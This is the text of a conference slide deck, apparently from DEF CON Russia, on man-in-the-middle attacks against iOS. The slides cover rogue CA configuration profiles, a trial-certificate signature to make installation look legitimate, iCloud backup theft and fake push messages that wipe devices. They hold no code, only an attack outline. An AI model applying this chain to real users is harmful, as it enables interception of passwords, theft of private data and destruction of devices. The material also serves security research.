Upload
defconrussia
View
2.569
Download
0
Tags:
Embed Size (px)
Citation preview
iOS MITM Attack Technology and effects
sieg.in 1
sieg.in 2
Boot validation
• CA – Apple Certificate Authority
• SIGN – Signature
sieg.in 3
Files Protection
sieg.in 4
Classic provisioning
sieg.in 5
Actual provisioning
sieg.in 6
Because “Apple Root CA” fingerprint hardcoded into iOS and have to be 61:1E:5B:66:2C:59:3A:08:FF:58:D1:4A:E2:24:52:D1:98:DF:6C:60
Why we can’t create fake signature?
sieg.in 7
SSL
sieg.in 8
Certificate Authority Storage
Few from 186 are quite interesting :
– C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DoD CLASS 3 Root CA
– C=JP, O=Japanese Government, OU=ApplicationCA
– C=CN, O=China Internet Network Information Center, CN=China Internet Network Information Center EV Certificates Root
…
sieg.in 9
Certificate authentication
sieg.in 10
I want my CA in your iOS
sieg.in 11
Ways to install CA in iOS
o Safari
o Email attachment
o MDM
With configuration profile
Can be installed with Safari
sieg.in 12
Attack
sieg.in 13
Mobileconfig contains
WiFi settings (pass, SSID) for “Gate”
CA
Proxy Settings, if we want victim’s traffic even it has left attack range. (Only for iOS6)
iCloud backup (enable it, if not)
sieg.in 14
Mobileconfig installation
sieg.in 15
Looks bad =(
sieg.in 16
Let’s take a look on default CA list...
sieg.in 17
COMODO trial certificate
• You only need valid [email protected] mail for confirmation
• Can be used for signing
sieg.in 18
How to sign
sieg.in 19
Looks much better
sieg.in 20
SSL Defeated But we want more
sieg.in 21
How to get files from device
sieg.in 22
Elcomsoft Phone Password Breaker
sieg.in 23
Once again
sieg.in 24
What’s in backup?
• SMS • Private photo • Emails • Application data • And more …
sieg.in 25
Files done But we want more
sieg.in 26
Apple Push Notification Service
sieg.in 27
Fake! Fake! Fake!
sieg.in 28
Wipe Tragedy (act 1/1)
sieg.in 29
Summary
User only have to tap ‘Install’ two times to make us able to :
– Sniff all his SSL traffic (cookies,passwords, etc)
– Steal his backup (call log, sms log, photos and application data)
– Send him funny push messages or just wipe device
sieg.in 30